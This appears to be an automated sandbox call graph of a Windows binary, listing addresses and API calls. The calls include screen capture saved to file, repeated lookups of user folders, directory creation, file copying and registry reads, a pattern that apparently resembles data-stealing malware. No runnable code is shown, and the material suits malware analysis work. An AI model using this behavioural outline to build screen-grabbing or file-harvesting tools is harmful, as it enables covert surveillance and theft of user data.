GetLastError 90858->90936 90864 5120df 90860->90864 90861->90866 90937 5121f0 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90861->90937 90862 512102 90865 549d90 2 API calls 90862->90865 90867 512136 90862->90867 90864->90862 90864->90866 90935 5121f0 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90864->90935 90868 512158 90865->90868 90866->90827 90867->90827 90868->90827 90881 514586 __fread_nolock __Strxfrm 90870->90881 90930->90828 90931->90839 90932->90840 90933->90828 90934->90855 90935->90862 90936->90853 90937->90866 90966 4fdbdc 90967 4fdc0a 90966->90967 90977 510a60 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90967->90977 90969 4fdc17 90970 4fef3c 90969->90970 90971 4feef2 90969->90971 90973 4fef61 90970->90973 90979 4ff530 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90970->90979 90972 4feef6 90971->90972 90978 4ff340 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90971->90978 90976 4fef32 90977->90969 90978->90976 90979->90970 90980 45dcd0 90981 45de11 90980->90981 90982 45dd1d 90980->90982 90983 41ab20 35 API calls 90981->90983 90984 41ab20 35 API calls 90982->90984 90985 45de6d 90983->90985 90986 45dd79 90984->90986 90987 4163b0 std::_Throw_Cpp_error 35 API calls 90985->90987 91000 41b980 90986->91000 90989 45de88 90987->90989 91022 481c10 90989->91022 90990 45ddd0 91005 4e5ff0 GdiplusStartup 90990->91005 90994 402df0 std::_Throw_Cpp_error 35 API calls 90996 45dea7 90994->90996 90997 4188d0 33 API calls 90998 45de02 90997->90998 90999 402df0 std::_Throw_Cpp_error 35 API calls 90998->90999 90999->90981 91001 41b9a4 91000->91001 91002 41b9b7 91000->91002 91001->90990 91083 4222f0 35 API calls 91002->91083 91004 41b9c1 91004->90990 91006 4e605f GetSystemMetrics GetSystemMetrics GetDC 91005->91006 91007 45ddf0 91005->91007 91008 4e6084 CreateCompatibleDC 91006->91008 91009 4e6230 GdiplusShutdown 91006->91009 91007->90997 91010 4e6096 CreateCompatibleBitmap 91008->91010 91011 4e6225 ReleaseDC 91008->91011 91009->91007 91012 4e621c DeleteObject 91010->91012 91013 4e60ac SelectObject BitBlt GdipCreateBitmapFromHBITMAP GdipGetImageEncodersSize 91010->91013 91011->91009 91012->91011 91014 4e6134 91013->91014 91015 4e61b2 GdipSaveImageToFile DeleteObject GdipDisposeImage 91013->91015 91016 4423ec ___std_exception_copy 3 API calls 91014->91016 91015->91012 91017 4e613a 91016->91017 91017->91015 91018 4e6146 GdipGetImageEncoders 91017->91018 91021 4e615a 91018->91021 91019 441c96 ___std_exception_destroy 2 API calls 91020 4e61ac 91019->91020 91020->91015 91021->91019 91023 4e6ca0 46 API calls 91022->91023 91081 481c6c __fread_nolock __Strxfrm 91023->91081 91024 48443c 91025 402df0 std::_Throw_Cpp_error 35 API calls 91024->91025 91026 45de95 91025->91026 91026->90994 91027 48449d 91028 402cf0 std::_Throw_Cpp_error 35 API calls 91027->91028 91029 4844ad 91028->91029 91158 407b10 35 API calls 3 library calls 91029->91158 91031 484598 91033 402cf0 std::_Throw_Cpp_error 35 API calls 91031->91033 91032 4844c8 91159 4351fb RaiseException 91032->91159 91035 4845a8 91033->91035 91163 407b10 35 API calls 3 library calls 91035->91163 91036 4844dc 91037 438c70 std::_Throw_Cpp_error 33 API calls 91036->91037 91040 4844e1 91037->91040 91038 48445e 91041 402cf0 std::_Throw_Cpp_error 35 API calls 91038->91041 91160 402b50 35 API calls 2 library calls 91040->91160 91045 48446e 91041->91045 91042 4845c3 91164 4351fb RaiseException 91042->91164 91156 407b10 35 API calls 3 library calls 91045->91156 91046 41b0e0 35 API calls 91046->91081 91047 4845d7 91049 484489 91157 4351fb RaiseException 91049->91157 91051 4844e6 91052 402cf0 std::_Throw_Cpp_error 35 API calls 91051->91052 91053 484503 91052->91053 91054 41ace0 35 API calls 91053->91054 91055 484518 91054->91055 91161 4351fb RaiseException 91055->91161 91056 484544 91059 402cf0 std::_Throw_Cpp_error 35 API calls 91056->91059 91058 4412b7 36 API calls 91058->91081 91061 484557 91059->91061 91060 416130 35 API calls 91060->91081 91063 41ace0 35 API calls 91061->91063 91062 41af80 35 API calls 91062->91081 91065 48456c 91063->91065 91064 402fe0 33 API calls std::_Throw_Cpp_error 91064->91081 91162 4351fb RaiseException 91065->91162 91067 4e64d0 35 API calls 91067->91081 91068 482793 SHGetFolderPathA 91068->91081 91069 482a95 SHGetFolderPathA 91069->91081 91070 482d93 SHGetFolderPathA 91070->91081 91071 4830f3 SHGetFolderPathA 91071->91081 91072 48341b SHGetFolderPathA 91072->91081 91073 483725 SHGetFolderPathA 91073->91081 91074 418b00 35 API calls 91074->91081 91075 4032d0 35 API calls std::_Throw_Cpp_error 91075->91081 91077 433672 35 API calls std::_Facet_Register 91077->91081 91078 403040 35 API calls std::_Throw_Cpp_error 91078->91081 91079 4185d0 35 API calls 91079->91081 91080 4163b0 35 API calls std::_Throw_Cpp_error 91080->91081 91081->91024 91081->91027 91081->91031 91081->91036 91081->91038 91081->91040 91081->91046 91081->91051 91081->91056 91081->91058 91081->91060 91081->91062 91081->91064 91081->91067 91081->91068 91081->91069 91081->91070 91081->91071 91081->91072 91081->91073 91081->91074 91081->91075 91081->91077 91081->91078 91081->91079 91081->91080 91082 402df0 35 API calls std::_Throw_Cpp_error 91081->91082 91084 4845e0 91081->91084 91082->91081 91083->91004 91085 484641 91084->91085 91086 485d64 91084->91086 91087 4e6ca0 46 API calls 91085->91087 91089 485dda 91085->91089 91184 4339b3 AcquireSRWLockExclusive ReleaseSRWLockExclusive SleepConditionVariableSRW 91086->91184 91091 484651 91087->91091 91185 402b50 35 API calls 2 library calls 91089->91185 91092 484a38 91091->91092 91096 4163b0 std::_Throw_Cpp_error 35 API calls 91091->91096 91099 485c79 91091->91099 91094 4163b0 std::_Throw_Cpp_error 35 API calls 91092->91094 91092->91099 91093 485ce9 91104 485d0c 91093->91104 91105 485d15 91093->91105 91097 484a58 91094->91097 91095 485ddf 91101 438c70 std::_Throw_Cpp_error 33 API calls 91095->91101 91098 4846b0 91096->91098 91100 4c6000 39 API calls 91097->91100 91102 4c6000 39 API calls 91098->91102 91099->91093 91099->91099 91107 403040 std::_Throw_Cpp_error 35 API calls 91099->91107 91155 484a6f std::ios_base::_Ios_base_dtor __fread_nolock __Strxfrm 91100->91155 91103 485dee 91101->91103 91138 4846c7 91102->91138 91182 413340 35 API calls 2 library calls 91104->91182 91183 413340 35 API calls 2 library calls 91105->91183 91112 485cc7 91107->91112 91108 485c67 91114 4185d0 35 API calls 91108->91114 91110 484a26 91113 4185d0 35 API calls 91110->91113 91111 485d11 91116 402df0 std::_Throw_Cpp_error 35 API calls 91111->91116 91115 4e6770 53 API calls 91112->91115 91113->91092 91114->91099 91117 485cd7 91115->91117 91118 485d28 91116->91118 91119 402df0 std::_Throw_Cpp_error 35 API calls 91117->91119 91119->91093 91126 433672 35 API calls std::_Facet_Register 91126->91155 91127 41ab20 35 API calls 91127->91138 91128 4163b0 35 API calls std::_Throw_Cpp_error 91128->91155 91129 41ad80 35 API calls 91129->91138 91130 402df0 std::_Throw_Cpp_error 35 API calls 91131 484870 CreateDirectoryA 91130->91131 91133 41ab20 35 API calls 91131->91133 91132 41ad80 35 API calls 91132->91155 91133->91138 91134 4163b0 35 API calls std::_Throw_Cpp_error 91134->91138 91135 415350 35 API calls 91135->91138 91137 41e8a0 35 API calls 91137->91155 91138->91110 91138->91127 91138->91129 91138->91130 91138->91134 91138->91135 91139 4845e0 90 API calls 91138->91139 91139->91138 91140 402df0 35 API calls std::_Throw_Cpp_error 91140->91155 91141 4e7220 61 API calls 91141->91155 91142 4032d0 35 API calls std::_Throw_Cpp_error 91142->91155 91143 485032 CreateDirectoryA 91143->91155 91144 485bbc CopyFileA 91145 485bdf 91144->91145 91144->91155 91145->91155 91146 418b00 35 API calls 91146->91155 91148 4852f2 CoInitialize 91149 485311 CoCreateInstance 91148->91149 91148->91155 91150 4853a1 CoUninitialize 91149->91150 91151 48532d 91149->91151 91150->91155 91151->91150 91152 4188d0 33 API calls 91152->91155 91153 4854fe PathFindExtensionA 91153->91155 91154 403040 35 API calls std::_Throw_Cpp_error 91154->91155 91155->91089 91155->91095 91155->91108 91155->91126 91155->91128 91155->91132 91155->91137 91155->91140 91155->91141 91155->91142 91155->91143 91155->91144 91155->91146 91155->91148 91155->91149 91155->91152 91155->91153 91155->91154 91165 415350 91155->91165 91181 4d3320 37 API calls 91155->91181 91156->91049 91157->91027 91158->91032 91159->91036 91160->91051 91161->91056 91162->91031 91163->91042 91164->91047 91166 4153a0 91165->91166 91175 415439 91165->91175 91175->91155 91181->91155 91182->91111 91183->91111 91184->91085 91185->91095 91187 45d510 91188 45d5cb 91187->91188 91189 45d51a 91187->91189 91191 4163b0 std::_Throw_Cpp_error 35 API calls 91188->91191 91190 413d50 35 API calls 91189->91190 91192 45d52c 91190->91192 91193 45d5df 91191->91193 91195 413d50 35 API calls 91192->91195 91194 413d50 35 API calls 91193->91194 91196 45d5f5 91194->91196 91197 45d542 91195->91197 91198 413d50 35 API calls 91196->91198 91199 413d50 35 API calls 91197->91199 91201 45d60b 91198->91201 91200 45d558 91199->91200 91202 413d50 35 API calls 91200->91202 91203 413d50 35 API calls 91201->91203 91204 45d56e 91202->91204 91205 45d621 91203->91205 91206 413d50 35 API calls 91204->91206 91207 413d50 35 API calls 91205->91207 91208 45d584 91206->91208 91209 45d637 91207->91209 91210 413d50 35 API calls 91208->91210 91211 413d50 35 API calls 91209->91211 91212 45d59a 91210->91212 91213 45d64d 91211->91213 91214 4163b0 std::_Throw_Cpp_error 35 API calls 91212->91214 91215 413d50 35 API calls 91213->91215 91216 45d5b2 91214->91216 91217 45d663 91215->91217 91218 4cbac0 35 API calls 91216->91218 91219 4163b0 std::_Throw_Cpp_error 35 API calls 91217->91219 91220 45d5bf 91218->91220 91223 45d67b 91219->91223 91220->91188 91221 45d5c6 91220->91221 91287 4d1450 94 API calls 3 library calls 91221->91287 91224 402df0 std::_Throw_Cpp_error 35 API calls 91223->91224 91225 45d788 91224->91225 91287->91188 91289 44c993 91290 44c9a0 __dosmaperr 91289->91290 91291 44c9b8 91289->91291 91318 438c60 33 API calls ___std_exception_copy 91290->91318 91293 44ca17 91291->91293 91301 44c9b0 91291->91301 91319 44d685 5 API calls 2 library calls 91291->91319 91295 44a1e9 __fread_nolock 33 API calls 91293->91295 91296 44ca30 91295->91296 91307 4487f7 91296->91307 91298 44ca38 91299 44a1e9 __fread_nolock 33 API calls 91298->91299 91298->91301 91300 44ca69 91299->91300 91300->91301 91302 44a1e9 __fread_nolock 33 API calls 91300->91302 91303 44ca77 91302->91303 91303->91301 91304 44a1e9 __fread_nolock 33 API calls 91303->91304 91305 44ca85 91304->91305 91306 44a1e9 __fread_nolock 33 API calls 91305->91306 91306->91301 91308 448803 __FrameHandler3::FrameUnwindToState 91307->91308 91309 448896 91308->91309 91311 44880b __dosmaperr 91308->91311 91313 44883d __dosmaperr 91308->91313 91320 44e6c4 EnterCriticalSection 91309->91320 91311->91298 91312 44889c 91315 448910 __fread_nolock 45 API calls 91312->91315 91316 4488bb __dosmaperr 91312->91316 91321 438c60 33 API calls ___std_exception_copy 91313->91321 91315->91316 91322 448908 LeaveCriticalSection __wsopen_s 91316->91322 91318->91301 91319->91293 91320->91312 91321->91311 91322->91311 91323 433718 91324 433721 91323->91324 91332 43724d 10 API calls 2 library calls 91324->91332 91326 433732 91331 433736 91326->91331 91333 44686a 91326->91333 91329 43374d 91332->91326 91337 451253 91333->91337 91336 43726c 7 API calls 2 library calls 91336->91331 91338 451263 91337->91338 91339 43373f 91337->91339 91338->91339 91341 44a376 91338->91341 91339->91329 91339->91336 91342 44a382 __FrameHandler3::FrameUnwindToState 91341->91342 91353 44424b EnterCriticalSection 91342->91353 91344 44a389 91354 44e626 91344->91354 91347 44a3a7 91367 44a3cd LeaveCriticalSection std::_Lockit::~_Lockit 91347->91367 91350 44a3b8 91350->91338 91351 44a3a2 91366 44a2c6 GetStdHandle GetFileType 91351->91366 91353->91344 91355 44e632 __FrameHandler3::FrameUnwindToState 91354->91355 91356 44e65c 91355->91356 91357 44e63b __dosmaperr 91355->91357 91368 44424b EnterCriticalSection 91356->91368 91376 438c60 33 API calls ___std_exception_copy 91357->91376 91361 44a398 91361->91347 91365 44a210 35 API calls 91361->91365 91363 44e694 91377 44e6bb LeaveCriticalSection std::_Lockit::~_Lockit 91363->91377 91364 44e668 91364->91363 91369 44e576 91364->91369 91365->91351 91366->91347 91367->91350 91368->91364 91370 44a65a std::_Locinfo::_Locinfo_ctor 3 API calls 91369->91370 91371 44e588 91370->91371 91373 44b7f4 __purecall 6 API calls 91371->91373 91375 44e595 91371->91375 91373->91371 91376->91361 91377->91361 91378 4e06d0 91379 4e0706 __wsopen_s 91378->91379 91380 41ab20 35 API calls 91379->91380 91381 4e083a 91380->91381 91382 439820 35 API calls 91381->91382 91383 4e08e8 91382->91383 91384 4e4585 91383->91384 91582 4e71e0 GetCurrentProcess IsWow64Process 91383->91582 91386 4163b0 std::_Throw_Cpp_error 35 API calls 91384->91386 91388 4e45a8 91386->91388 91390 4e7640 70 API calls 91388->91390 91389 403350 59 API calls 91392 4e09c4 91389->91392 91391 4e45b7 91390->91391 91645 4e55a0 MultiByteToWideChar 91391->91645 91394 403350 59 API calls 91392->91394 91396 4e0a6e 91394->91396 91584 44196b GetSystemTimeAsFileTime 91396->91584 91397 439820 35 API calls 91399 4e467b 91397->91399 91401 4e46ad 91399->91401 91403 441628 56 API calls 91399->91403 91400 4e0a78 91586 441e53 91400->91586 91404 402df0 std::_Throw_Cpp_error 35 API calls 91401->91404 91406 4e46a7 91403->91406 91405 4e0a93 91583 4e0900 91582->91583 91583->91389 91585 4419a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 91584->91585 91585->91400 91587 441e81 91586->91587 91588 441e6d __dosmaperr 91586->91588 91591 441e7d __dosmaperr 91587->91591 91662 44e2a0 33 API calls 2 library calls 91587->91662 91661 438c60 33 API calls ___std_exception_copy 91588->91661 91591->91405 91646 4e5640 __Getctype 91645->91646 91653 4e56ea 91645->91653 91649 4e5656 MultiByteToWideChar 91646->91649 91646->91653 91647 402df0 std::_Throw_Cpp_error 35 API calls 91648 4e45d0 91647->91648 91648->91397 91650 4e566e WideCharToMultiByte 91649->91650 91658 4e56e1 91649->91658 91652 4e5698 __Getctype 91650->91652 91650->91658 91651 441c96 ___std_exception_destroy 2 API calls 91651->91653 91654 4e56a9 WideCharToMultiByte 91652->91654 91652->91658 91653->91647 91655 4e56db 91654->91655 91656 4e56c3 91654->91656 91657 441c96 ___std_exception_destroy 2 API calls 91655->91657 91659 416130 35 API calls 91656->91659 91657->91658 91658->91651 91659->91655 91661->91591 91662->91591 91663 45f460 91664 45f4cc 91663->91664 91665 45f4ad 91663->91665 91666 4163b0 std::_Throw_Cpp_error 35 API calls 91665->91666 91667 45f4bf 91666->91667 91669 493f40 91667->91669 91670 4359b0 __fread_nolock 91669->91670 91671 493f95 SHGetFolderPathA 91670->91671 91672 494100 91671->91672 91673 403040 std::_Throw_Cpp_error 35 API calls 91672->91673 91674 49411c 91673->91674 91675 41fbf0 35 API calls 91674->91675 91677 49414d std::ios_base::_Ios_base_dtor 91675->91677 91676 4e6ca0 46 API calls 91683 49420d 91676->91683 91677->91676 91678 495779 91677->91678 91679 438c70 std::_Throw_Cpp_error 33 API calls 91678->91679 91682 49577e 91679->91682 91680 495742 91681 402df0 std::_Throw_Cpp_error 35 API calls 91680->91681 91684 495757 91681->91684 91683->91680 91683->91682 91686 41e8a0 35 API calls 91683->91686 91685 402df0 std::_Throw_Cpp_error 35 API calls 91684->91685 91687 495766 91685->91687 91688 4942f3 91686->91688 91687->91664 91689 4e6ca0 46 API calls 91688->91689 91690 494314 91689->91690 91691 49572d 91690->91691 91693 41ab20 35 API calls 91690->91693 91692 402df0 std::_Throw_Cpp_error 35 API calls 91691->91692 91692->91680 91694 494444 91693->91694 91759 466d20 91760 466d6a 91759->91760 91762 468712 91760->91762 91763 41ab20 35 API calls 91760->91763 91766 46974b 91760->91766 91761 469b34 91876 492440 91761->91876 91767 41ab20 35 API calls 91762->91767 91765 466e01 91763->91765 91768 4e6ca0 46 API calls 91765->91768 91766->91761 91773 41ab20 35 API calls 91766->91773 91769 4687eb 91767->91769 91771 466e27 91768->91771 91775 439820 35 API calls 91769->91775 91770 469e50 91913 412c30 35 API calls 2 library calls 91770->91913 91777 4e6c10 45 API calls 91771->91777 91781 466e4a 91771->91781 91778 469838 91773->91778 91774 469e62 91779 468813 91775->91779 91776 469b42 91776->91770 91783 41ab20 35 API calls 91776->91783 91777->91781 91786 439820 35 API calls 91778->91786 91782 402df0 std::_Throw_Cpp_error 35 API calls 91779->91782 91780 468700 91784 402df0 std::_Throw_Cpp_error 35 API calls 91780->91784 91781->91780 91785 41b260 35 API calls 91781->91785 91791 467b0b 91781->91791 91793 46882a 91782->91793 91787 469c31 91783->91787 91784->91762 91871 466e79 91785->91871 91788 469860 91786->91788 91794 439820 35 API calls 91787->91794 91789 402df0 std::_Throw_Cpp_error 35 API calls 91788->91789 91801 46987a 91789->91801 91790 4686e5 91790->91780 91799 4e6770 53 API calls 91790->91799 91791->91790 91792 41b260 35 API calls 91791->91792 91874 467b2e 91792->91874 91793->91766 91796 403350 59 API calls 91793->91796 91797 469c59 91794->91797 91795 467afc 91798 408ab0 35 API calls 91795->91798 91805 4688bd 91796->91805 91798->91791 91799->91780 91801->91761 91803 403350 59 API calls 91801->91803 91802 4686d6 91804 408ab0 35 API calls 91802->91804 91825 469911 91803->91825 91804->91790 91807 41b260 35 API calls 91805->91807 91811 469003 91805->91811 91854 4688e3 91807->91854 91809 469b2e 91813 43d0a8 58 API calls 91809->91813 91812 469743 91811->91812 91817 41b260 35 API calls 91811->91817 91816 43d0a8 58 API calls 91812->91816 91813->91761 91814 4130f0 35 API calls 91814->91874 91815 413200 35 API calls 91815->91871 91816->91766 91856 469026 91817->91856 91818 468ff4 91819 408ab0 35 API calls 91818->91819 91819->91811 91822 413200 35 API calls 91822->91874 91823 469734 91824 408ab0 35 API calls 91823->91824 91824->91812 91825->91809 91827 403350 59 API calls 91825->91827 91827->91825 91828 4130f0 35 API calls 91828->91854 91830 402cf0 35 API calls std::_Throw_Cpp_error 91830->91871 91831 4130f0 35 API calls 91831->91856 91832 413200 35 API calls 91832->91854 91833 402cf0 35 API calls std::_Throw_Cpp_error 91833->91874 91834 413200 35 API calls 91834->91856 91835 402cf0 35 API calls std::_Throw_Cpp_error 91835->91854 91836 41af80 35 API calls 91836->91871 91837 402cf0 35 API calls std::_Throw_Cpp_error 91837->91856 91838 41af80 35 API calls 91838->91874 91839 41b400 35 API calls 91839->91871 91840 41b400 35 API calls 91840->91854 91841 41af80 35 API calls 91841->91854 91842 41b400 35 API calls 91842->91856 91843 41b400 35 API calls 91843->91874 91844 4163b0 35 API calls std::_Throw_Cpp_error 91844->91874 91845 41ac50 35 API calls 91845->91871 91846 41af80 35 API calls 91846->91856 91847 416240 35 API calls 91847->91874 91848 4e6ca0 46 API calls 91848->91871 91849 402df0 35 API calls std::_Throw_Cpp_error 91849->91854 91850 4e6ca0 46 API calls 91850->91874 91851 403350 59 API calls 91851->91854 91852 4e6c10 45 API calls 91852->91871 91853 4163b0 35 API calls std::_Throw_Cpp_error 91853->91871 91854->91818 91854->91828 91854->91832 91854->91835 91854->91840 91854->91841 91854->91849 91854->91851 91855 403350 59 API calls 91855->91856 91856->91823 91856->91831 91856->91834 91856->91837 91856->91842 91856->91846 91856->91855 91857 402df0 35 API calls std::_Throw_Cpp_error 91856->91857 91857->91856 91858 416210 35 API calls 91858->91871 91859 41ac50 35 API calls 91859->91874 91860 416210 35 API calls 91860->91874 91862 4e6d70 60 API calls 91862->91871 91863 402df0 35 API calls std::_Throw_Cpp_error 91863->91874 91864 4e6d70 60 API calls 91864->91874 91865 439820 35 API calls 91865->91871 91866 4e6c10 45 API calls 91866->91874 91867 439820 35 API calls 91867->91874 91868 403350 59 API calls 91868->91871 91869 416240 35 API calls 91869->91871 91870 402df0 35 API calls std::_Throw_Cpp_error 91870->91871 91871->91795 91871->91815 91871->91830 91871->91836 91871->91839 91871->91845 91871->91848 91871->91852 91871->91853 91871->91858 91871->91862 91871->91865 91871->91868 91871->91869 91871->91870 91872 43d0a8 58 API calls 91871->91872 91903 4130f0 91871->91903 91912 4e6470 35 API calls 91871->91912 91872->91871 91873 403350 59 API calls 91873->91874 91874->91802 91874->91814 91874->91822 91874->91833 91874->91838 91874->91843 91874->91844 91874->91847 91874->91850 91874->91859 91874->91860 91874->91863 91874->91864 91874->91866 91874->91867 91874->91873 91875 43d0a8 58 API calls 91874->91875 91875->91874 91914 493b60 91876->91914 91878 4924ad 91878->91776 91879 4924a7 91879->91878 91880 403040 std::_Throw_Cpp_error 35 API calls 91879->91880 91881 4924ee 91880->91881 91883 418f00 std::_Throw_Cpp_error 35 API calls 91881->91883 91884 4925a0 91883->91884 91935 4938d0 39 API calls 2 library calls 91884->91935 91901 4925c7 std::ios_base::_Ios_base_dtor __Strxfrm 91904 413114 91903->91904 91905 41316c 91903->91905 91904->91871 91906 402cf0 std::_Throw_Cpp_error 35 API calls 91905->91906 91907 413179 91906->91907 91939 407b10 35 API calls 3 library calls 91907->91939 91909 413191 91940 4351fb RaiseException 91909->91940 91911 4131a2 91912->91871 91913->91774 91915 4423ec ___std_exception_copy 3 API calls 91914->91915 91916 493ba5 __fread_nolock 91915->91916 91917 4423ec ___std_exception_copy 3 API calls 91916->91917 91918 493bc4 __fread_nolock 91917->91918 91919 493bd7 RegOpenKeyExA 91918->91919 91920 493f1b 91919->91920 91921 493d97 RegQueryValueExA RegCloseKey 91919->91921 91920->91879 91921->91920 91922 493dc5 91921->91922 91923 403040 std::_Throw_Cpp_error 35 API calls 91922->91923 91924 493dea 91923->91924 91925 493f30 91924->91925 91926 403040 std::_Throw_Cpp_error 35 API calls 91924->91926 91927 438c70 std::_Throw_Cpp_error 33 API calls 91925->91927 91929 493e35 __Strxfrm 91926->91929 91933 493eb9 91927->91933 91928 493e97 std::ios_base::_Ios_base_dtor 91931 441c96 ___std_exception_destroy 2 API calls 91928->91931 91929->91925 91929->91928 91930 438c70 std::_Throw_Cpp_error 33 API calls 91931->91933 91933->91930 91934 493ee9 std::ios_base::_Ios_base_dtor 91933->91934 91934->91879 91935->91901 91939->91909 91940->91911 91941 4fd664 91951 51f160 91941->91951 91943 4fd673 91945 4feef2 91943->91945 91946 4fef3c 91943->91946 91944 4feef6 91945->91944 91982 4ff340 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 91945->91982 91947 4fef61 91946->91947 91983 4ff530 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 91946->91983 91950 4fef32 91953 51f176 91951->91953 91952 51f1f6 91961 51f3fc 91952->91961 91999 536a10 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 91952->91999 91953->91952 91956 51f3c8 91953->91956 91953->91961 91998 536d40 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection __fread_nolock 91953->91998 91956->91956 91956->91961 91984 545de0 91956->91984 91958 51f212 91959 51f244 91958->91959 91960 51f306 91958->91960 92000 536af0 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 91959->92000 91963 548370 3 API calls 91960->91963 91961->91943 91964 51f2ff 91963->91964 92005 5214c0 5 API calls __fread_nolock 91964->92005 91966 51f25a 92001 536a10 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 91966->92001 91967 51f35c 91970 549d90 2 API calls 91967->91970 91972 51f376 91967->91972 91969 51f2b4 91971 51f2f5 91969->91971 92002 50e650 53 API calls __fread_nolock 91969->92002 91970->91972 92004 51f450 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection __Strxfrm 91971->92004 92006 51f7a0 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 91972->92006 91975 51f2c7 91975->91961 92003 520b90 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 91975->92003 91977 51f39e 91979 548370 3 API calls 91977->91979 91980 51f3b2 91979->91980 92007 536930 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 91980->92007 91982->91950 91983->91946 91985 545df8 91984->91985 91986 545eb7 91985->91986 91990 545e4a 91985->91990 91987 545ea5 __fread_nolock 91986->91987 91988 54a0f0 3 API calls 91986->91988 91987->91961 91989 545ec9 91988->91989 91989->91987 91994 54a0f0 3 API calls 91989->91994 91990->91987 91991 549d90 2 API calls 91990->91991 91992 545e8c 91991->91992 91992->91987 91993 546470 2 API calls 91992->91993 91996 545e9c 91993->91996 91995 545f37 91994->91995 91995->91987 91997 549d90 2 API calls 91995->91997 91996->91961 91997->91987 91998->91952 91999->91958 92000->91966 92001->91969 92002->91975 92003->91971 92004->91964 92005->91967 92006->91977 92007->91956 92008 4ea460 92009 429070 37 API calls 92008->92009 92010 4ea4cc 92009->92010 92081 407110 92010->92081 92012 4ea4fd 92013 4ea527 92012->92013 92015 4eaec2 92012->92015 92014 4188d0 33 API calls 92013->92014 92016 4ea533 92014->92016 92277 406750 35 API calls 2 library calls 92015->92277 92018 4eae8d 92016->92018 92021 4ea67b 92016->92021 92271 41aa90 37 API calls 92016->92271 92019 402df0 std::_Throw_Cpp_error 35 API calls 92018->92019 92022 4eaea0 92019->92022 92085 4f89a0 92021->92085 92026 402df0 std::_Throw_Cpp_error 35 API calls 92022->92026 92029 4eaeaf 92026->92029 92028 4ea6a5 92031 429070 37 API calls 92028->92031 92034 4ea6d4 92031->92034 92033 4ea553 92035 41a4f0 35 API calls 92033->92035 92106 41a8d0 92034->92106 92037 4ea585 92035->92037 92272 405980 37 API calls 92037->92272 92041 4ea5a0 92043 418f00 std::_Throw_Cpp_error 35 API calls 92041->92043 92044 4ea5b2 92043->92044 92045 402df0 std::_Throw_Cpp_error 35 API calls 92044->92045 92082 40712d 92081->92082 92280 432022 11 API calls ___std_fs_open_handle@16 92082->92280 92084 40713d 92084->92012 92086 4f89ad __wsopen_s 92085->92086 92087 4f8a4c 92086->92087 92090 439820 35 API calls 92086->92090 92088 4f8acd 92087->92088 92089 4f8a6c 92087->92089 92287 43d5bc 92087->92287 92088->92028 92281 43936a 92089->92281 92090->92087 92271->92033 92272->92041 92280->92084 92282 43937e ___std_exception_copy 92281->92282 92297 438d41 92282->92297 92288 43d5cf ___std_exception_copy 92287->92288 92289 43d34d 55 API calls 92288->92289 92290 43d5e4 92289->92290 92291 43899c ___std_exception_copy 33 API calls 92290->92291 92298 438d4d __FrameHandler3::FrameUnwindToState 92297->92298 92596 433c33 92598 433c47 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall 92596->92598 92597 433c4d 92598->92597 92599 433cce 92598->92599 92627 4436f8 33 API calls 2 library calls 92598->92627 92618 434299 92599->92618 92604 433cdc 92605 433ce9 92604->92605 92628 4342cf GetModuleHandleW 92605->92628 92607 433cf0 92608 433cf4 92607->92608 92609 433d5e 92607->92609 92610 433cfd 92608->92610 92629 4436d3 17 API calls __purecall 92608->92629 92631 44371e 17 API calls __purecall 92609->92631 92630 433889 64 API calls ___scrt_uninitialize_crt 92610->92630 92614 433d64 92616 4436e2 __purecall 17 API calls 92614->92616 92615 433d05 92615->92597 92619 4359b0 __fread_nolock 92618->92619 92620 4342ac GetStartupInfoW 92619->92620 92621 433cd4 92620->92621 92622 446974 92621->92622 92632 450675 92622->92632 92624 4469b7 92624->92604 92625 44697d 92625->92624 92636 450925 33 API calls 92625->92636 92627->92599 92628->92607 92629->92610 92630->92615 92631->92614 92633 45067e 92632->92633 92635 4506b0 92632->92635 92637 450480 43 API calls 3 library calls 92633->92637 92635->92625 92636->92625 92637->92635 92638 4fd6fd 92648 51ffe0 92638->92648 92640 4fd707 92641 4fef3c 92640->92641 92642 4feef2 92640->92642 92644 4fef61 92641->92644 92665 4ff530 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 92641->92665 92643 4feef6 92642->92643 92664 4ff340 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 92642->92664 92647 4fef32 92649 51ffff 92648->92649 92661 5200a5 92648->92661 92650 520020 92649->92650 92651 520008 92649->92651 92666 520a70 92650->92666 92687 547510 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 92651->92687 92654 520016 92654->92640 92655 520083 92655->92661 92671 549960 92655->92671 92656 520027 92656->92655 92659 5200d3 92656->92659 92656->92661 92658 52009e 92658->92661 92662 549d90 2 API calls 92658->92662 92688 547510 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 92659->92688 92661->92640 92663 520115 92662->92663 92663->92640 92664->92647 92665->92641 92667 520b2d 92666->92667 92668 520a83 92666->92668 92667->92656 92669 54a0f0 3 API calls 92668->92669 92670 520a8c __Strxfrm 92668->92670 92669->92670 92670->92656 92672 549975 92671->92672 92684 549a33 92671->92684 92673 5499dd 92672->92673 92674 549979 92672->92674 92675 5499ed 92673->92675 92679 549a5e 92673->92679 92676 54a0f0 3 API calls 92674->92676 92678 549999 92674->92678 92677 5499fb 92675->92677 92681 54a0f0 3 API calls 92675->92681 92676->92678 92677->92658 